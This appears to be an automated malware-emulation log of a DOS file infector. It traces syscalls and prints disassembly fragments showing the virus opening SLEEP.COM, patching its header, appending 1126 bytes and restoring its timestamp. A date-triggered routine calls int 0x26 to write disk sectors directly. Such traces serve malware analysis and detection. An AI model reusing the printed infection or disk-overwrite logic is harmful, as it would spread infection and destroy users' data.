2018-12-25T12:45:15.355226415Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.35835342Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.361467113Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.36410499Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.365446862Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.368008827Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.377710277Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.37997609Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.382474773Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.391084332Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.40195529Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:15.405263798Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.412336266Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.419720942Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.422344315Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.433696007Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.435518786Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.443186287Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.446174607Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.449160886Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.453143461Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.454667086Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.457098353Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.466509034Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.469087518Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.470591812Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.479392091Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.490612582Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:15.492670784Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.496727112Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:15.741213745Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:15.74412306Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:15.747316924Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:15.752360646Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:15.753621461Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:15.760360239Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.767303974Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:15.774219447Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:15.776688348Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:15.79345829Z 62 PC: 12cac | Close file
2018-12-25T12:45:15.795285903Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:15.803920367Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:15.806963004Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.80977741Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:15.812978908Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:15.814434864Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.816652787Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:15.826892015Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.8291482Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:15.830640193Z 62 PC: 12d11 | Close file
2018-12-25T12:45:15.839468365Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:15.845968986Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:15.847679129Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.853130078Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.857237733Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.858609264Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.865087519Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.866352647Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.873493859Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.877535759Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.879319465Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.881511891Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.88230439Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.884145509Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.889624403Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.890953644Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.89213118Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.897074452Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.903218857Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:15.90542828Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:15.909587885Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:15.913670586Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:15.91558346Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:15.926407966Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:15.928246883Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:15.941184364Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:15.948956768Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:15.95171297Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:15.955475755Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:15.956969551Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.959238232Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:15.969014853Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:15.971358137Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:15.972903495Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:15.981822016Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:15.992817848Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:15.995130946Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:15.999565324Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.558512938Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:16.561387997Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:16.564076239Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:16.567891119Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:16.569531698Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:16.575383041Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:16.581687452Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:16.595249283Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:16.597374994Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.512209479Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.514850051Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.529970437Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.536972349Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.539831754Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.543664618Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.544941002Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.547455325Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.558474778Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.560902766Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.562684999Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.571759029Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.593503559Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.596328919Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.60451862Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.61107903Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.613518935Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.624523242Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.626876942Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.633662424Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.636872299Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.640133394Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.643029641Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.644698125Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.647693239Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.656380762Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.658825586Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.661554831Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.669573859Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.679173948Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.682772369Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.689455234Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.696054528Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.699089021Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.708950487Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.711015847Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.718576151Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.721685716Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.724492655Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.727972837Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.730553397Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.733262365Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.742787588Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.745190861Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.746911966Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.754713776Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.764955249Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:17.767011985Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.771040096Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.836476777Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:16.839423734Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:16.842225761Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:16.846265524Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:16.848990078Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:16.854885441Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:16.861230823Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:16.868354563Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:16.870843912Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.51258807Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.516657844Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.524968836Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.53219852Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.535405345Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.53970767Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.541963097Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.544683294Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.555236623Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.557824446Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.55977512Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.575082591Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.587109671Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.590058687Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.600749572Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.612709391Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.615581666Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.625891969Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.628140577Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.635105784Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.638432407Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.650272064Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.653821564Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.65619356Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.659135418Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.667591663Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.66972539Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.671938771Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.679436943Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.689066647Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.692669543Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.698999238Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.705182473Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.708239674Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.71809548Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.719810147Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.728075365Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.730926155Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.7335303Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.737013344Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.738393346Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.740418787Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.749449542Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.751766099Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.753265464Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.761652122Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.77204026Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:17.774495786Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.778940755Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.995745764Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:16.998557512Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:17.001275452Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:17.005011711Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:17.006588016Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:17.016930204Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.02780382Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:17.034581875Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:17.03662112Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.513136259Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.516264283Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.5227226Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.525680339Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.528497167Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.531668075Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.533270379Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.535630289Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.545183219Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.547567294Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.549315008Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.562400514Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.572092628Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.574586121Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.581467254Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.588001855Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.590375013Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.604948042Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.60705104Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.613812842Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.617647825Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.620536384Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.624158548Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.626693934Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.629352191Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.638744025Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.641692043Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.64567169Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.653473544Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.663463302Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.667449501Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.674105443Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.680553331Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.684327239Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.694583154Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.69652392Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.703731696Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.706674485Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.709410026Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.712708493Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.714369652Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.716664305Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.725831067Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.728267509Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.729760656Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.737480653Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.748622758Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
